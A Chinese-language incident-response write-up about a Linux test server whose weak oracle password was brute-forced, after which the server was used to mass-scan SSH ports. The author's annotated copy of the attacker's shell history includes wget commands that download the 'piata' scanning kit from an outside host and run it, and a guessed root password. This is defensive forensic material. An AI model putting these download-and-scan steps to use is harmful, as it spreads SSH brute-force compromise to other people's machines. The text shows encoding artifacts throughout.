一次服務(wù)器淪陷為肉雞后的實(shí)戰(zhàn)排查過(guò)程!

2021-02-03    分類: 網(wǎng)站建設(shè)

?1、從防火墻癱瘓說(shuō)起

今天還沒(méi)到公司就被電話告知辦公室無(wú)法正常連接互聯(lián)網(wǎng)了,網(wǎng)速非常慢,無(wú)法正常瀏覽網(wǎng)頁(yè)。急急忙忙感到公司,開(kāi)始查找問(wèn)題。

首先排除了交換機(jī)故障,因?yàn)閮?nèi)部局域網(wǎng)正常。當(dāng)ping防火墻設(shè)備時(shí),丟包嚴(yán)重。很明顯,防火墻出了問(wèn)題,撐不住了,其Web管理界面根本無(wú)法正常登陸。立即聯(lián)系其服務(wù)商遠(yuǎn)程查找問(wèn)題,經(jīng)過(guò)近3個(gè)小時(shí)的分析,得出結(jié)論是網(wǎng)內(nèi)有兩臺(tái)

主機(jī)A配置如下:

  1. OS?-?RedHat?Enterprise?Linux?Server?release?6.x?
  2. 部署軟件?-?Tomcat,sshd,?oracle?
  3. RAM?-?8GB?
  4. CPU?-?Intel?Core?i3-2130?
  5. IP地址?-?172.16.111.22?

主機(jī)B為客戶托管主機(jī),具體配置不詳。

本文只對(duì)主機(jī)A進(jìn)行分析處理。

通過(guò)防火墻命令行界面,抓包發(fā)現(xiàn)A機(jī)器瘋狂對(duì)一組IP地址進(jìn)行22端口掃描。下面是抓包結(jié)果片段:

  1. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:39895=====>183.58.99.130:22,?packet=3,?bytes=208[REPLY]?183.58.99.130:22=====>59.46.161.39:39895,?packet=0,?bytes=0?
  2. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33967=====>183.58.99.131:22,?packet=3,?bytes=208[REPLY]?183.58.99.131:22=====>59.46.161.39:33967,?packet=0,?bytes=0?
  3. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34117=====>183.58.99.132:22,?packet=3,?bytes=208[REPLY]?183.58.99.132:22=====>59.46.161.39:34117,?packet=0,?bytes=0?
  4. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54932=====>183.58.99.125:22,?packet=3,?bytes=208[REPLY]?183.58.99.125:22=====>59.46.161.39:54932,?packet=0,?bytes=0?
  5. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:60333=====>183.58.99.135:22,?packet=3,?bytes=208[REPLY]?183.58.99.135:22=====>59.46.161.39:60333,?packet=0,?bytes=0?
  6. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52737=====>183.58.99.136:22,?packet=3,?bytes=208[REPLY]?183.58.99.136:22=====>59.46.161.39:52737,?packet=0,?bytes=0?
  7. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:52291=====>183.58.99.137:22,?packet=3,?bytes=208[REPLY]?183.58.99.137:22=====>59.46.161.39:52291,?packet=0,?bytes=0?
  8. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46183=====>183.58.99.138:22,?packet=3,?bytes=208[REPLY]?183.58.99.138:22=====>59.46.161.39:46183,?packet=0,?bytes=0?
  9. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:36864=====>183.58.99.139:22,?packet=3,?bytes=208[REPLY]?183.58.99.139:22=====>59.46.161.39:36864,?packet=0,?bytes=0?
  10. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:34515=====>183.58.99.133:22,?packet=3,?bytes=208[REPLY]?183.58.99.133:22=====>59.46.161.39:34515,?packet=0,?bytes=0?
  11. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:57121=====>183.58.99.134:22,?packet=3,?bytes=208[REPLY]?183.58.99.134:22=====>59.46.161.39:57121,?packet=0,?bytes=0?
  12. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37830=====>183.58.99.140:22,?packet=3,?bytes=208[REPLY]?183.58.99.140:22=====>59.46.161.39:37830,?packet=0,?bytes=0?
  13. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:42742=====>183.58.99.141:22,?packet=3,?bytes=208[REPLY]?183.58.99.141:22=====>59.46.161.39:42742,?packet=0,?bytes=0?
  14. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:55018=====>183.58.99.142:22,?packet=3,?bytes=208[REPLY]?183.58.99.142:22=====>59.46.161.39:55018,?packet=0,?bytes=0?
  15. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:46447=====>183.58.99.143:22,?packet=3,?bytes=208[REPLY]?183.58.99.143:22=====>59.46.161.39:46447,?packet=0,?bytes=0?
  16. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:51039=====>183.58.99.147:22,?packet=3,?bytes=208[REPLY]?183.58.99.147:22=====>59.46.161.39:51039,?packet=0,?bytes=0?
  17. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:33123=====>183.58.99.146:22,?packet=3,?bytes=208[REPLY]?183.58.99.146:22=====>59.46.161.39:33123,?packet=0,?bytes=0?
  18. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35956=====>183.58.99.151:22,?packet=3,?bytes=208[REPLY]?183.58.99.151:22=====>59.46.161.39:35956,?packet=0,?bytes=0?
  19. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:45002=====>183.58.99.145:22,?packet=3,?bytes=208[REPLY]?183.58.99.145:22=====>59.46.161.39:45002,?packet=0,?bytes=0?
  20. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:54711=====>183.58.99.150:22,?packet=3,?bytes=208[REPLY]?183.58.99.150:22=====>59.46.161.39:54711,?packet=0,?bytes=0?
  21. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:58976=====>183.58.99.155:22,?packet=3,?bytes=208[REPLY]?183.58.99.155:22=====>59.46.161.39:58976,?packet=0,?bytes=0?
  22. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:37967=====>183.58.99.157:22,?packet=3,?bytes=208[REPLY]?183.58.99.157:22=====>59.46.161.39:37967,?packet=0,?bytes=0?
  23. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:47125=====>183.58.99.158:22,?packet=3,?bytes=208[REPLY]?183.58.99.158:22=====>59.46.161.39:47125,?packet=0,?bytes=0?
  24. proto=6?TCP?TCP_NS_ESTABLISHED,status:00001198,left_time:0s,172.16.35.201:35028=====>183.58.99.156:22,?packet=3,?bytes=208[REPLY]?183.58.99.156:22=====>59.46.161.39:35028,?packet=0,?bytes=0?

可以清晰的看到,肉雞掃描程序瘋狂掃描一個(gè)網(wǎng)段內(nèi)的22端口。

2、查找黑客行蹤的方法

對(duì)于Linux主機(jī),出現(xiàn)問(wèn)題后分析和處理的依據(jù)主要是日志。/var/log/messages、/var/log/secure都是必不可少的分析目標(biāo),然后就是.bash_history命令記錄。黑客登錄主機(jī)必然會(huì)在日志中留下記錄,高級(jí)黑客也許可以刪除痕跡,但目前大部分黑客都是利用現(xiàn)成工具的黑心者,并無(wú)太多技術(shù)背景。該主機(jī)對(duì)外開(kāi)放三個(gè)TCP偵聽(tīng)端口:

  1. 22?sshd?
  2. 80?Tomcat?
  3. 1521?Oracle?

這三個(gè)服務(wù)都有可能存在漏洞而被攻擊,最容易被掃描攻擊的還是sshd用戶名密碼被破解。所以最先分析 /var/log/secure日志,看登錄歷史。

3、淪陷過(guò)程分析

3.1 oracle用戶密碼被破解

分析/var/log/secure日志。不看不知道一看嚇一跳,該日志已經(jīng)占用了四個(gè)文件,每個(gè)文件都記錄了大量嘗試登錄的情況,執(zhí)行命令:

  1. cat?secure-20150317?|?grep?'Failed?password'?|?cut?-d?"?"?-f?9,10,11?|?sort?|?uniq?

結(jié)果如下:

  1. invalid?user?admin??
  2. invalid?user?dacx??
  3. invalid?user?details3??
  4. invalid?user?drishti??
  5. invalid?user?ferreluque??
  6. invalid?user?git??
  7. invalid?user?hall??
  8. invalid?user?jparksu??
  9. invalid?user?last??
  10. invalid?user?patrol??
  11. invalid?user?paul??
  12. invalid?user?pgadmin??
  13. invalid?user?postgres??
  14. invalid?user?public??
  15. invalid?user?sauser??
  16. invalid?user?siginspect??
  17. invalid?user?sql??
  18. invalid?user?support??
  19. invalid?user?sys??
  20. invalid?user?sysadmin??
  21. invalid?user?system??
  22. invalid?user?taz??
  23. invalid?user?test??
  24. invalid?user?tiptop??
  25. invalid?user?txl5460??
  26. invalid?user?ubnt??
  27. invalid?user?www??
  28. mysql?from?10.10.10.1??
  29. oracle?from?10.10.10.1??
  30. root?from?10.10.10.1?

可以看出攻擊程序不斷采用不同的賬戶和密碼進(jìn)行嘗試。然后在接近尾部的地方發(fā)現(xiàn)如下2行,說(shuō)明被攻破了。

  1. Mar?9?20:35:30?localhost?sshd[30379]:?Accepted?password?for?oracle?from?10.10.10.1?port?56906?ssh2?
  2. Mar?9?20:35:30?localhost?sshd[30379]:?pam_unix(sshd:session):?session?opened?for?user?oracle?by?(uid=0)?

可見(jiàn)賬戶oracle的密碼被猜中,并成功登入系統(tǒng)。

3.2 黑客動(dòng)作推演

下面看看黑客用oracle賬戶都做了什么。首先復(fù)制一份oracle的命令歷史,防止后續(xù)操作丟失該記錄。

  1. cp?/home/oracle/.bash_history?hacker_history?

然后查看分析這個(gè)文件。 我在后面?zhèn)渥⒘撕诳偷南敕ā?/p>

  1. vi?.bash_profile?
  2. vi?.bash_profile?(查看.bash_profile,看變量設(shè)置,把/home/oracle/bin增加到PATH)?
  3. ll?
  4. cd?/?
  5. vi?.bash_profile?
  6. vi?.bash_profile?(執(zhí)行,設(shè)置環(huán)境變量)?
  7. w?
  8. ps?x?(查看系統(tǒng)運(yùn)行進(jìn)程)?
  9. free?-m?(查看內(nèi)存大?。?
  10. uname?-a?(查看系統(tǒng)版本)?
  11. cat?/etc/issue?(查看系統(tǒng)發(fā)行版)?
  12. cat?/etc/hosts?(查看是否有網(wǎng)內(nèi)機(jī)器)?
  13. cat?/proc/cpuinfo?(查看CPU型號(hào))?
  14. cat?.bash_history?(查看oracle賬戶歷史操作)?
  15. w?(查看系統(tǒng)負(fù)載)?
  16. ls?-a?(查看/home/oracle/下的隱藏文件)?
  17. passwd?(修改掉oracle賬戶的密碼)?
  18. exit??
  19. ls??
  20. oracle?
  21. sqlplus?(運(yùn)行sqlplus)?
  22. su?(試圖切換到root賬戶)?
  23. app1123456?(猜測(cè)root密碼)?
  24. ls??
  25. su?-?
  26. w?
  27. free?-m?
  28. php?-v?(查看php版本)?
  29. exit?
  30. w?
  31. free?-m?
  32. php?-v?
  33. ps?aux?
  34. ls?-a?
  35. exit?
  36. w?
  37. free?-m?
  38. php?-v?
  39. cat?bash_his?(查看歷史命令)?
  40. cat?bash_history?
  41. cat?.bash_history?
  42. wget?scriptcoders.ucoz.com/piata.tgz?(下載肉雞攻擊軟件包)?
  43. tar?zxvf?piata.tgz?(解壓軟件包)?
  44. rm?-rf?piata.tgz?(刪除軟件包)?
  45. cd?piata/?(切換到攻擊軟件目錄)?
  46. ls?-a?
  47. chmod?+x?*?
  48. ./a?210.212?(運(yùn)行攻擊軟件)?
  49. screen?(試圖運(yùn)行screen命令,發(fā)現(xiàn)沒(méi)有后下載它)?
  50. ls?-a?
  51. wget?scriptcoders.ucoz.com/screen.tgz?
  52. tar?zxvf?screen.tgz?(解壓)?
  53. ./screen?
  54. exit?
  55. w?
  56. ps?x?
  57. cd?piata/?(切換到攻擊軟件目錄)?
  58. ls?-a?
  59. cat?vuln.txt?(查看攻擊結(jié)果)?
  60. ls?-a?
  61. mv?vuln.txt?1.txt?(保存攻擊結(jié)果)?
  62. ./screen?-r?
  63. nano?1.txt?(查看結(jié)果文件)?
  64. w?
  65. ps?x?
  66. exit?
  67. cd?piata?
  68. ps?x?
  69. ls?-a?
  70. nano?2.txt?
  71. exit?
  72. w?
  73. ps?x?
  74. cd?piata/?
  75. ls?-a?
  76. cat??
  77. mv?vuln.txt?2.txt?(保存結(jié)果)?
  78. nano?2.txt?
  79. w?
  80. ps?x?
  81. cd?piata/?
  82. ls-?a?
  83. cat?vuln.txt??
  84. rm?-rf?vuln.txt??
  85. ./screen?-r?
  86. exit?
  87. w?
  88. ps?x?
  89. cd?piata/?
  90. ls?-a?
  91. cat?vuln.txt??
  92. ls?-a?
  93. mv?vuln.txt?3.txt?(保存結(jié)果)?
  94. nano?3.txt??
  95. exit?
  96. w?
  97. ps?x?
  98. cd?piata/?
  99. ls?-a?
  100. cat?vuln.txt??
  101. rm?-rf?vuln.txt??
  102. exit?
  103. w?
  104. ps?x?
  105. cd?piata/?
  106. ls?-a?
  107. cat?vuln.txt??
  108. rm?-rf?vuln.txt??
  109. rm?-rf?1.txt??
  110. rm?-rf?2.txt?
  111. rm?-rf?2.txt.save??
  112. rm?-rf?3.txt??
  113. screen?-r?
  114. ./screen?-r?
  115. exit?
  116. w?
  117. ps?x?
  118. cd?piata/?
  119. ls?-a?
  120. cat?vuln.txt??
  121. ls?-a?
  122. nano?vuln.txt??
  123. rm?-rf?vuln.txt??
  124. screen?-r?
  125. ./screen?-r?
  126. exit?
  127. w?
  128. ps?x?
  129. cd?piata/?
  130. ls?-a?
  131. cat?vuln.txt??
  132. nano?vuln.txt??
  133. w?
  134. ls?-a?
  135. rm?-rf?vuln.txt??
  136. screen?-r?
  137. ./screen?-r?
  138. exit?
  139. w?
  140. ps?x?
  141. cd?piata/?
  142. ls?-a?
  143. cat?vuln.txt??
  144. rm?-rf?vuln.txt??
  145. ps?x?
  146. ls?-a?
  147. ./screen?-r?
  148. exit?
  149. w?
  150. ps?x?
  151. cd?piata/?
  152. ls?-a?
  153. cat?vuln.txt??
  154. nano?vuln.txt??
  155. w?
  156. rm?-rf?vuln.txt??
  157. ./screen?-r?
  158. exit?

3.3 攻擊工具一覽

前面通過(guò)命令歷史記錄,可以看出攻擊工具軟件包為名為piata。下載來(lái)看看它的面目。

  1. [root@localhost?piata]#?ll?
  2. total?1708?
  3. -rw-r--r--.?1?oracle?oinstall?0?Mar?10?13:01?183.63.pscan.22?
  4. -rwxr-xr-x.?1?oracle?oinstall?659?Feb?2?2008?a?
  5. -rwxr-xr-x.?1?oracle?oinstall?216?May?18?2005?auto?
  6. -rwxr-xr-x.?1?oracle?oinstall?283?Nov?25?2004?gen-pass.sh?
  7. -rwxr-xr-x.?1?oracle?oinstall?93?Apr?19?2005?go.sh?
  8. -rwxr-xr-x.?1?oracle?oinstall?3253?Mar?5?2007?mass?
  9. -rwxr-xr-x.?1?oracle?oinstall?12671?May?18?2008?pass_file?
  10. -rwxr-xr-x.?1?oracle?oinstall?21407?Jul?22?2004?pscan2?
  11. -rwxr-xr-x.?1?oracle?oinstall?249980?Feb?13?2001?screen?
  12. -rw-r--r--.?1?oracle?oinstall?130892?Feb?3?2010?screen.tgz?
  13. -rwxr-xr-x.?1?oracle?oinstall?453972?Jul?13?2004?ss?
  14. -rwxr-xr-x.?1?oracle?oinstall?842736?Nov?24?2004?ssh-scan?
  15. -rw-r--r--.?1?oracle?oinstall?2392?Mar?10?05:03?vuln.txt?

其中 a, auto, go.sh gen-pass.sh, 都是bash腳本文件,用于配置掃描網(wǎng)段,調(diào)用掃描程序。pscan2和ssh-scan則為掃描程序。 vuln.txt記錄獲得的肉雞列表。

目前尚未發(fā)現(xiàn)其他系統(tǒng)文件被黑客修改,也沒(méi)有自動(dòng)運(yùn)行攻擊軟件的設(shè)置。

4 深刻教訓(xùn)

雖然這次被攻擊的機(jī)器只是一個(gè)測(cè)試主機(jī),其本身的重要性并不高,但卻造成了防火墻的癱瘓,進(jìn)而造成互聯(lián)網(wǎng)不能正常訪問(wèn)。對(duì)此,必須引起足夠重視,并從中汲取教訓(xùn)。

系統(tǒng)賬戶密碼一定要有一定的復(fù)雜度。這次攻擊就是由于oracle賬戶密碼過(guò)于簡(jiǎn)單所致。

sshd采用密碼方式登錄風(fēng)險(xiǎn)很大,特別是密碼簡(jiǎn)單的時(shí)候??尚械那闆r下,盡量關(guān)閉密碼方式,改用公鑰方式。

作為數(shù)據(jù)中心管理員,一定要監(jiān)督監(jiān)管系統(tǒng)管理員和軟件開(kāi)發(fā)商的服務(wù)安全,本次被攻擊主機(jī)就是把所有權(quán)限都放給了網(wǎng)站開(kāi)發(fā)公司,而開(kāi)發(fā)公司對(duì)運(yùn)營(yíng)安全并不重視。

本文標(biāo)題:一次服務(wù)器淪陷為肉雞后的實(shí)戰(zhàn)排查過(guò)程!
標(biāo)題路徑:http://www.muchs.cn/news9/99009.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供建站公司、ChatGPT、網(wǎng)頁(yè)設(shè)計(jì)公司、品牌網(wǎng)站建設(shè)、網(wǎng)站營(yíng)銷(xiāo)、動(dòng)態(tài)網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來(lái)源: 創(chuàng)新互聯(lián)

成都網(wǎng)站建設(shè)公司